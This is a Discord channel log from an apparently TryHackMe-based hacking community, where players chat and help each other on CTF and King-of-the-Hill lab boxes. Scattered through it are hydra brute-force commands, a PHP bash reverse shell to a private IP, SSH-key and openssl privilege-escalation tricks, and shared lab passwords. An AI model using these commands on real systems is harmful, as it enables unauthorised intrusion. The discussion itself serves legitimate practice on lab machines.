#voice-chat
mount doesn't like me 😦
;-;
sudo apt install nfs-common
You need NFS stuff
i still can't update or install anything with sudo tho
0% [Connecting to rs.archive.ubuntu.com (147.91.175.253)]
Apt update?
--fix-missing?
faulty source
no i removed the kali source as soon as i installed the gobuster
like instantly
hang on im gonna go make cigarete\
cigarette
Also, those things'll kill ya
aren't you a little bit young to smoke mate?
(i started when i was 12 😂 )
that's not something you should be proud of
im not proud of it
fair nuff
focus the will to finish boxes into stopping smoking
but then i won't want to finish boxes
ooo you gave me an idea
what if i multitask
nope.

LUL
@marble cape rn

wow my internet just broke
@forest python do you want to watch me do a writeup on wonderland ?
okay lets make it 😂
i'll make it tomorrow xd
i'll record the walkthrough and will do the writeup later
im tired tho
i need to finish my writeup and start the python playground one 
man i need to learn making boxes
I just got RCE on python playground 😄
im thinking of making a stego challenge
which needs less box development
then i'll go with box dev i guess
@gaunt thunder i guess i accidentally triggered Muir
Fair warning -- we aren't really accepting things like steg / encoding / crypto in their own right
what
As in, we usually reject challenges like that
@full sapphire if i publish my room to public how long would i have to wait till it becomes public public
keep them as a filler between normal releases 
@tame ether i really have so basic idea about box dev
We're blocked in for the next month
i'd love to (not that i'd want to do any of the boxes, blood is better)
Muri whens my box out?
(i kid)
i saw john hammond's pickle box dev its just that
@plucky vault If it gets approved, at least a month just now
not really @gaunt thunder
@muted sand Which one is it?
it's encoding + exploiting
wut
@full sapphire Jeff
Jeff
i didnt understand
ye
yo whats goin on XD

28th @muted sand
you mean box dev is not that hard? @tame ether
Oo ty 😛
@forest python help me i broke something
nwm i fixed it
should i add points to my walkthrough?
i go on phone
in bed
yo guys didnt want to cut your talking so im writing from here
its 4.07 a.m. and im out for today
take care
@forest python @marble cape @plucky vault
Jorad: Then you may not pass until you answer the following question. Name something you take on a picnic.
Meg Griffin: A blanket!
Brian Griffin: Potato salad!
Chris Griffin: Chicken!
Lois Griffin: Merlot
Stewie Griffin: A dead Lois!
Peter Griffin: Ah, ah, ah, okay, ah, ...
nmap -sV -v -T4 <ip>
gobuster dir -u <url> -w wordlist (optional stuff -x <.extension> -t sets the threads #100 recommended)
maybe this is help, my own common web wordlist
tac /etc/passwd | tac
@prime summit nope. but i got it now. solved the challenge haha
cool
hey
wsl --set-default-version 2
[================== 31.4% ]
done ?
@safe plover https://www.opera.com/gx
I'm #21 in ranking 😛
In binary 👏
there are 10 types of people in this world
those who understand binary and those who don't
And those who didn't expect a ternary joke
git gud scrub
who is ghost pinging me
🤷
just like that yes lol
yeah? @plucky vault
you are supposed to solve the CTF? as you solve any other challenge
did you hear me ? \
can we ask for help on a KOTH? Or hints?
sure
the one hackers
very hard to find a way to get in
I know it has to do with probably using hydra for example against either ftp or ssh
would that be correct?
Hackers was designed to be difficult.
I see that hahaha
That's all I'll speak to :p
no probs. I'll see what else I can find 😉
hi
i have no mic
oh, it's ff1 character
sure no
it's girl from "SKAM"*
2
hi again
i have problems with thm network all the day
like ssh freezes, I have no ping, etc
!multivpn
Type ps aux | grep openvpn into your terminal and press enter
If there's more than one line (and the second doesn't have "grep" in it), do the following steps
Type killall openvpn into your terminal and press enter
Start the VPN with sudo openvpn <path-to-config>
Give that a try
Thanks, but I have bad connection on 2 different networks on 2 different pc
Is the VPN open on both of them at once?
No
strrev
Like in the morning it was laggy and now it's laggy too
echo $reversed_s = join(' ',array_reverse(explode(' ',"Hello World")));
good bye
cya
wfuzz
Should I stick to Ubuntu or switch to Kali>
I'd ask in probably #room-help buddy 🙂
@tame ether how are you gonna make the cli tool?
In BP Networking the answer shows wrong in task3 question number 2 convert decimal 34 to binary I put the answer correct but it says wrong answer please help me
@crisp moat #room-help
@lofty estuary
change your speaker settings
good idea
you guys playing koth? can i join in?
no but we can start one
naughty join
There is mostly a flag in every user folder. user.txt and one in root.txt and you gotta find others
😄
you need to find the credentials for the ssh
every KOTH machine have ssh enabled
cve-2019-16278
@candid maple which room?
Lion
i dont use metasploit or those exploits for koth actually
for lion i havent done much except getting a reverse shell
from uploads
there are like 3,4 ways to get into every KOTH machine. and not everyone knows all the ways in so there is always a possibility for you to find a way to get in
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
umm i have done every machine in KOTH except carnage and offline
i can root every koth machine in like within a minute except hackers it takes like 3 minutes max
i am back
something came up
i can do a walkthrough for you if you want? @candid maple
yeah
yeah id_rsa
i havent patched anything
To use id_rsa you need to chmod 600 id_rsa
@candid maple ^
yeah
sudo chmod 600 id_rsa
ssh id_rsa ashu@10.10.121.68
ssh -i id_rsa
sudo -l
do you know what it does? ^
google it. what sudo -l does
ask in #site-support
about your vpn keep crashing
i hate carnage
havent done it yet 😄
imma try some day
cant show the full method do it 😄
bruteforcing it
@lofty moat im late to the party.
What are you doing
Ok
@lofty moat what are somethings that are against thm's tos
that some players do
?
what about the 9 flags
@lofty moat sorry for the pings ^^
what about the 9 flags @lofty moat
"9 flages to obtain" @lofty moat
@lofty moat Will you be streaming everyday? This is so helpful.Thank you
🙂
@lofty moat can we open ports or something? is it allowed?
@lofty moat how about changing the active file descriptor for king.txt? 😄
I like that flag finder
My favorite way to mess with other players: set a bunch of movie quotes as a bash array, for loop through /pts/x that’s not me, echo a quote from the array to their /dev/pts, sleep 2 seconds.
@lofty moat editing /proc/fd of koth binary
aah never done that
the magic word being sudo?
he sets aliases for multiple commands
Ah ah ah is another favorite of mine
But I try and stay away from using that one if there are folks new to that box. Gotta make sure they have a chance to learn and have fun
@lofty moat thanks for the tips really helpful, i wish you can stream on the daily.
😄
cya
cya
Panda is another fun one. Took me forever to get an initial foothold the first time. But after that it was quick
damn he's on fire
yep. Closing every way in.
I’ve found additional instances of chatter in weird places. This is my chattr-finder:
clear; find / -name "chatt" -type f -exec ls -ld {} ; 2>/dev/null
how do you write into the file if someone used chattr?
chattr -i file
thank you @thick cipher
what do you mean by looking for chattr?
wont which chattr will locate that?
also you can change the name for the chattr binary as well
Put a backslash before the final semi-colon to escape out. Discord removed it for some reason
The backslash escapes the semi-colon. No space between
can't you upload your own binaries to make sure they're fine? xD
same thing for which chattr?
I’ve had issues with which chattr. I think which only looks in your path where that one-liner looks everywhere
You can also compile your own chattr
lel
well that one liner will only look for chattr, if someone is changing the path they can also change the name for it as well
Example: Food has multiple copies hidden around
damn I wish it was the same in my room
i use killall or kill -9
wouldnt killall kill your own shell?
No.
oh.Didnt know that
If you had removed the php from the beginning then it would have worked @lofty moat
@lofty moat Change the ip
🤔
@lofty moat Try this one(you'll also need to change ip): exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
any idea why the first connection kept closing?
@brave tartan that was a wrong reverse shell i think
17 minutes to start (and I'm live streaming it, because why not): https://tryhackme.com/games/koth/join/dcd31988358391daa6fa7164
I blame @lofty moat for making me want to stream one lol
its 1 am
ouch! get some zzz
imma go against you tomorrow 😄
lol
stream is loading for anyone?
I can't see anything on the stream rn :/
@lofty moat come join the koth?
@winged agate aah gonna sleep
@lofty moat please
toooo much tired
aah okay :)
i would love to turned off VM as well
who gonna live stream
@thick cipher you are not going to stream ? 😢
welp gn 🙂
I am, it's just being a pain
lol
yeah, it's tmux
ok i need to activate the mouse selection
it's great once you get it the way you like it
lol
you're a monster
how so? i haven't done anything but get king.....i didn't even do anything to keep it lol
how do you connect to the backdoor ?
my pc crashed :(
oki 🙂
use hydra and rockyou
thats what i was trying
@winged agate oh that sucks! can you get it back up quickly?
ill try :)
sweet! i'm not going ham, so king is absolutely up for grabs
In top terminal is that a watch command?
okay :)
not really. it's a while true loop.
Noiceee
while true; do clear; date; echo -e "\nCurrent king: $(cat /root/king.txt)\n"; w | grep -iv $MyIP; sleep 2; done
It lets me see who's on the box without being a jerk about it
wtf
What do you mean by theme?
you using a theme in kali right ?
no, just regular old kali. my terminal is tmux that i put a script to together to launch and whatnot
mmh oki i'm going to check that
@floral trout you gotta scan again also you can use -t 64 for faster results
Your hydra has the wrong input for a failed login. try manually once with it going through burp
that'll give you the accurate "incorrect" notation so you can tell hydra
@floral trout did you get it working?
have you tried to login through the browser with burp in the middle?
yep
the site it's sending creds to, and your "login failed" need fixing
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.122.134 http-post-form "/backdoor:username=^USER^&password=^PASS^:Incorrect Credentials" -V
this is my command
plague
i have the same thing
For those that requested reset, i haven't done anything to close any services or change passwords
exact same command
hydra -l plague -P /usr/share/wordlists/rockyou.txt -t 64 -I $TGT_IP http-form-post "/api/login:username=^USER^&password=^PASS^:F=Incorrect" -V
/api/login ?
That's why you kick an attempt on burp.
this line was important so
POST /api/login HTTP/1.1
yeah i was searching for the line "referer" in burp
but i didn't found it
referrer not needed
oki
it runs 64 threads at the same time instead of just one
yeah. it'll find the password to login to the backdoor for you
and it changes everytime. so you have to re-run the hydra command every reset / game
hi @plucky vault
NICE!! Congrats!!!
Now work on a regular shell... the backdoor is cool and all, but shells are better
lol, i'm not kicking anyone this round....but i might mess around a tiny bit, but no super dick moves
hydra to get the password on the backdoor
Stream working?
as best i know, it is
that's weird. lemme restart the broadcast
lol. i don't have a mic hooked up to my kali vm or i would talk at least a little bit lol
Box reset ?
@plucky vault On my screen is your hint once you're on the backdoor
Umm i think no? Did you privesc from using that gtfo sudo privesc method?
He is not talking
Not really. I did a sudo file write of my public key in to /root/.ssh/authorized_keys then just did a regular ssh
if i run those commands it isnt working
Which commands?
^
It wont work
Try the other methods. How can you use openssl
could you demonstrate? :D
You need to run some commands on your attacker box (kali, parrot, blackarch) and some on the target / victim box for that one
Well i did when i was streaming 😂
i wasn't here
but if you use the file write to put your ssh public key as authorized for root........................................................
Well just read that gtfo page what else you can do?
And there goes n0beard spoiling the method 🤣😂
@lofty moat someone once told me that gcrawford's ssh key is "leaked". . . have you ever seen it anywhere but when you're already on the box?
lol
Yeah have seen it
now push for a true shell and you should be able to FIND a bunch of flags
For hackers
a stabilized shell ?
you can either try to stabilize it, or find a way to login through ssh
Google how to upgrade your shell to a fully working one
@lusty light may or may not have talked about exactly that in a presentation . .. . .. . . . that's online . . . . . .
❤️
Welcome @lusty light ! Kick ass job this weekend on that CTF!
Poor Man's Pentest is obsolete, go use pwncat https://github.com/CalebStewart/pwncat
@thick cipher Ah thank you so much! Hope it was a blast!
I didn't get a chance to play, but i got to see your videos on it
Hey @lusty light i'm in love with this community thanks to your youtube channel, so take all my love w3
❤️
@floral trout Ah thank you, that is great to hear!
@thick cipher i saw a sudo permission though openssl with sudo but can i get a shell with that
if you think outside the box a bit. figure out a way to get authorized for ssh.....perhaps as root even
@lusty light I know that you don't understand why people are watching you doing koth because you just swap between 57 shells but eh it's funny and you can learn a lot 😄
at the end, can you do a walkthrough on how you did it?
I've learned a TON watching John's wild shells
@winged agate not while the box is still live. when they put it in the warehouse i might
i hate the bruteforce part
agreed
ah okay
a lot of google and even more trial/error
have you done the THM rooms? kept notes somewhere on what you've learned?
the psw is changing though a reset ?
yes, it changes every single time
erf
Try Hack Me
Damn......i made @lusty light king, but the game doesn't recognize it because he's not in the match 😦
oh i understand better the key.perm file which has appear from nowhere now xD
like i do some nmap stuff and every single time i'm in the same place as i was before
@plucky vault nmap and gobuster are great places to start on ANY koth
Uhmm i don't wanna be rude but please no unnecessary mentions please?
Good call
That's okay. We all start from zero at some point in our lives. Start completing the THM rooms. Blue Team and Red Team Primers are a great place to start. just keep notes
this box is so easy to sabotage
what is this bad token error message ?
do you use metasploit
@plucky vault Sometimes, but a lot of the KotH games you don't need it
I think it's just because I let the session time out
nmap is just the first step
@floral trout it's when someone took the next session by logging in ...
ah!
lol
should i stop?
woah
@slim knoll probably. some folks are trying to learn
Private games, however, lol
@winged agate hello fellow, greetings from Bucharest
quite late now ^^
neither was i. i thought we could all have a backdoor session at the same time
but, there is a problem anyway
@thick cipher we needed this ?
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
@thick cipher exactly this is the problem
I'm also from bucharest, @slim knoll :D
That's one way. It'll get you a reverse shell. But there are other ways to get a regular shell if you use your imagination
oki 🙂
it was a nice game guys
Thanks, it was funny
gg :)
Good game!
not very close but still funny ^^
we are all learning
@winged agate i know Andrei :))
Having fun and learning, that's what it's all about
should we pick another box?
sure
Unfortunately I have to adult for a while, but that was fun!
Do Carnage
I can make one for you guys if no one got premium?
should we pick one box?
some of you wants to talk while hacking ?
i'm not very good in english but it's a good practise
Public KotH starts in 24 minutes; might live stream if there's interest: https://tryhackme.com/games/koth/join/e0aa448d317b7dc4dce3ebd8
KotH starts in 8 minutes: https://tryhackme.com/games/koth/join/e0aa448d317b7dc4dce3ebd8
Live streaming KotH that starts in about 8 minutes: https://tryhackme.com/games/koth/join/2e0cfa7772e1e5088a40ed2c
Playing for fun: https://tryhackme.com/games/koth/join/39f4bbc788ccc424b5a0b1df
Szy late night classes, yaaayyy
since we're all deaf in here let me teach u some british sign language
But why not? 😰
No we're not deaf, we're mute
Same thing
no lesson because i'm watching netflix rn 
So its not 
screen share
@tame ether what ya watching
is it good?
If only I had Netflix
yeah, pretty good
I wouldn't ask szy to stream
Haha imagine having Netflix. 
@lofty moat i can stream netflix i currently have 300 kbps up so you'll maybe get 64p quality
Only rich kids gets to have Netflix
Those kids from school who use to bully me have one
You should try to impress them with Amazon Prime instead. Git Gud.
"rich kids" 
smh bee
The only thing i have to impress someone is .... Actually nothing,whom am i kidding
GBR ded 😦
Yeah I was wondering why my computer was talking
Szy almost 18.. noted in my Dark diary
Now tell me your security question answers.
Aah gn. Gotta wake up in 4,5 hours.
Get some sleep. Sleep = good
gn naughty
Imma brb in few mins
whats happenin here boys...
hope you don't talk about me when i'm gone
@tame ether That's all we've been doing.
yeah yeah
hunting thieves is more important than listening to you deciding whether you want to ban me or not 
he's not kidding
¯_(ツ)_/¯
@tame ether You hunt thieves?
im a 56 years old female living in alaska
we just found a ctf that straight up ripped our stuff only changing flags 
most of the challenges are just old released ones with changed flags

@tame ether That is super annoying
yeah
even ripped the rule text from our discord channel without changing our fancy ctf name that was put in there lmao
Oof
That hurts
How about tomato juice?
No way 😆
loll
PG13 @marble cape 😁

Also @midnight fern I can still hear you...
I do not believe this has devolved into @midnight fern offering relationship advice 
It absolutely has
It’s getting worse
Lol
@full sapphire you left us
I’m going to have to leave now.
I have PWK to do, and my music is more soothing than you lot simping 😁
@full sapphire I heard you simping in there too.
Focus on the PWK's bro!
Not all the Women of THM.
Smh. When have you ever seen me interested in anyone?...
In me 
You wish 😆
hhahahha ❤️

Question, on https://thispersondoesnotexist.com/
This Person Does Not Exist
Do these people really not exist?
I can't tell if it's a good photoshop job
Those people are computer generated
It's neither -- they're literally generated when you click the button
Hence the backgrounds sometimes being, uh...
Demonic
I think so
That is absolutely insane.
I know someone who can see through it
That literally looks like a typical dude I'd know
But only one
Mhm. Something about the forehead distance.
This one tho
I was looking at the microphone embedded in his chin
Explains a lot
🤣
cisterian monk
@plucky vault You aussie too, mate?
I saw the time on your box and realised it wasn't mine.
@rustic mica, any ideas on what I should do next?
Man, you exhausted every avenue I would have thought to take.
hmmm.
@plucky vault have you tried find / -iname "pass*" 2> /dev/null ?
Or did you find the pass already?
I see the file in there.
Yeah man, that find command brings it up. Look harder at the results.
Hahaha, SO CLOSE
THERE HE GOES
hahaha
Nice one man
F
I gotchu fam.
Intel CPUs and AMD CPUs without cooling, see what happened!
@marble cape Outside? Someone turned the gamma up too high out there.
whatcha guys talkin about in general?
@marble cape That would be something I'd love to read, myself.
@marble cape https://www.freetechbooks.com/ I found this as well. Pretty good for some ebooks.
This site lists free online computer science, engineering and programming books, textbooks and lecture notes, all of which are legally and freely available.
Texas is just America's Sydney.
You got it boy @plucky vault
Play all your games on Linux. Lutris is an Open Source gaming platform for Linux. It installs and launches games so you can start playing without the hassle of setting up your game. Get your games from GOG, Steam, Battle.net, Origin, Uplay and many other sources running on any...
cat file | base64 # encode
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
echo 'base64-string' | base64 -d > file.wav
Flag 33 is misleading since you need to be logged in as bob. But its first mentioned at flag 34.
clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR
This may cause "CL_OUT_OF_RESOURCES" or related errors
@fringe hare what are you doing??
great
Good morning? @plucky vault what time is it in your country?
9:44AM.
my microphone broke
again
I have no fucking idea.
im strumped
stumped
//
spontaneous
random
no changes to settings or anything
Nice, just enabled rdp from a meterpreter session.
Just finished a box
ice
I might not be able to hear you.
Because of noise
what noise?
Vacuum
okay its gone now
Server muted?
oh
happy weekend
Yu gi oh and pokemon were my childhood.
Everyone will complain about the government; which is good, it keeps them accountable.
What's with 568.c on exploit-db? I can't even compile this crappy code.
Am I streaming?
Alright im going.
see ya guys.
@lapis furnace I will neither confirm or deny the realness of my pic

👀
i feel old 
Liar @midnight fern 🤣
My name is Mary Lou Dudechacho and I'm 69 years old. I live in Mars.
@plucky vault you going to deceive your boi 
@plucky vault i'll mail you taquitos if you give me 0day's info you got 😎
Can't bb
i understand :(
i'll eat the taquitos myself
Can we crowdfund this?
@full sapphire smh I won't be so easily bribed
@plucky vault ❤️ you
<3
This advisory details the tactics, techniques and procedures (TTPs) identified during the ACSC investigation of a cyber campaign targeting Australian networks. These TTPs are captured in the frame of tactics and techniques outlined in the MITRE ATT&CK framework.
\
So what are you guys doing rn?
sitting around a campfire and spitting in the fire
I meant for the people live in voice chat but ok .
watching sexual reproduction videos for my bio class
We were talking about ethical hacking
Got onto discussing it from one of the dumb post earlier on what is on a child's pc
@visual wyvern https://www.youtube.com/watch?v=AtuAdk4MwWw
https://www.youtube.com/watch?v=g_Row8zEJZc
i see 0day's page opened in another tab 👀
turn these off if it gets annoying:
is it ok if i type my story?
clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR
once upon a time, it is the story from 2014 an online friend of mine got his FB account got hacked(thats what he told me) with whom i used to play some online facebook game i knew how to a lil about phishing about that time nothing special. one of my friends from academy used to brag about how he knows how to hack facebook. i asked him if he could recover he just said some stuff like he goes to inspect element and do this thing and that and gets into the user account. He was saying it with such confidence i believed him. i just went home and started looking into it what he said.. then i realized he was just lying he dont know a thing about hacking. thats when i heard about kali and installed it. i used kali for like a year or two whenever i was free. i learnt how to use metasploit, a couple of other tools as well. i hacked my own windows 7 machine at that time with some trojans and stuff. started looking into keyloggers. after that i reinstalled windows for some reason and never got a chance to reinstall it till 3 months ago. and started THM after that.
It seems a lot that people pick up hacking for a reason, then drop it for years and try to pick it up again later as an actual thing. I like solving puzzles and that's basically what hacking is. Doing proper hacking sounds like a great time. I'd definitely love to especially dig into the social engineering/lock picking part, too. At least that's what I'll Let Myself In got me thinking about. Most people don't expect a girl to walk in and actually be malicious. I'm glad it doesn't surprise anyone here that I'm a bit of a deviant, but most people don't expect it of me. "Girls don't do that" is normally the answer I get and it makes sense to me to exploit that weakness. If there's an obvious hole, you should absolutely exploit it.
I'm muted atm, I have some music on while I actually do my homework right now. I gotta get it turned in before Sunday so I want to make sure that's done so I'm not freaking out later. 🙂
Also deafened via hardware so I can put music through my ears instead of chatter.
The struggle is real :D
Translation:
He:Bro i want to learn hacking.
He: I saw you comments of facebook
Me:Yeah, What you want to learn?
@slim sage off topic but Dota > LOL
oh its @fossil estuary i checked your site its really good <3
briskets.io
thanks @lofty moat . I appreciate it
i cant talk but i hear ya 😄
Offensive pentest = OSCP path
a KOTH match really quick? if anyone wants to play ever just ping me
Metasploit comes with a variety of payloads, as we all know. Those payloads come in a few different types, and vary depending on platform. Of those types, there are two major “categories” available with a key difference that is often not understood. They are staged and stagele...
@visual wyvern are you doing Game Zone?
Sorry my dad was on my computer.
Clicking shit.
Don't say anything through the microphone coz he's here.
@merry valve okay watch
Yeah

no idea lol
i wasnt here. what was he asking about missing?
I have nothing but FTP anon
and some possible usernames
First time doing Hackers
Does anyone know if what I'm doing is the right path?
This is taking forever
want spoilers?
Sure
plague is the user for that http
Good
So I was right on that part
Why is it taking forever? This is supposed to be fast paced right?
just brute force on that, its the easier path
Sure

I'll give it 5 more mins
if nothing, I'm rage quitting
this is boring
@lofty moat confirmed that I have to use Hydra, I am assuming this box had way more resources when it was a KOTH.
Ending one
to boost the other
or may be play a KOTH machine instead?
I am not into the KOTH life
@midnight fern not very PG-13 of you 😉
I played it twice, I think it's fun to watch.
play against Will 😛
He'd beat me with little effort
lol
check DM 😄
I am stuck on a bruteforce right now
idk what is wrong but xD
btw in Hackers it will always newly generate on every new game. (id_rsa,passwords)
password for ftp and ssh user is the same
all caps?
yeah
gg
i still dont know why its not showing you result for plague
try plague. you have the credentials
the http backdoor
yeah
you cant change directory from that backdoor.. its just to get reverse shell
i think ^
yeah Hackers is by James
nah never tried that
you can but i want to see that binary in action
well not that sudo one but you can read write with openssl
sooo
so just sudo openssl any you like to read/write
Noice
If you haven't done it
the binary is good but i simply just add my ssh key in root ssh. and ssh into root. or you can write in /etc/passwd for your new user
Dont grab those. they are useless
They are always newly generated. Passwords and ssh keys
i challenge you to privesc from that 😄 😛
i havent done that yet..
its the easiest to brute force in. simple ssh brute force
no
tried twice. couldnt find the way
find / -perm -4000 2>/dev/null if thats what you looking for?
No
i just did that plague brute force nothing else after that
i know this 😛
Wonderland
used the same method
everyone close your eyes 😄
Noice

There's still one that i dont know of
James said direct root shell in one minute
There was one glitch before.. you could just access that /backdoor/shell by setting session token to nothing. and get reverse shell. but james fixed that. i think there should be something related to that with this here.
yeah
you can access /backdoor/shell by changing post to get request in burp(Thats the way i did it) and if you were to type anything in here it would say invalid session token or something like that
If you go in /backdoor and change post request to get request and then access /backdoor/shell it wont kick you out. you can type commands in there but it would say session token invalid
Yeah there is
This ^^^
Ok
in the mean time if anyone wants to play koth??
i am always up for some koth games
which room is this ?
When "Session token" was a thing
i can brute force in but is it ok if i grab that binary from your ip? @midnight fern
imma try as well to find that way
thanks
@midnight fern look closely to that binwalk output
@forest python All 6 chars
well it is from rockyou. so may be try comparing?
with no line breaks?
is that hackers i am seeing?
@fast wind he's trying to find that insta root
ah I thought that was patched?
i even had this password once for Hackers:
Ah dangit, I never tried looking for it when Ninja said that its removed(I think he said that (short term mem))
@fast wind not that insta root but a better way of brute forcing. if you can figure out how wordlist is made
Ah! That is something!
The wordlist is made the exact same way as in Fortune
@full sapphire Copy that down copy that down!
There are tools to make custom wordlists
well if you can just make a custom wordlist from rock you of just 6,7 letters it will be faster.
i didnt saved passwords but these are the ones that i got before:
teresa , donegal,england.
I am not sure about that ihateboys one, if it was from hackers or fortune.
lemme check if i have saved passwords in firefox
Those are the passwords that i ever got, see if that help smh:
wafako 123321123 120689 blue10 melrose ihateboys


Finally, i got that shit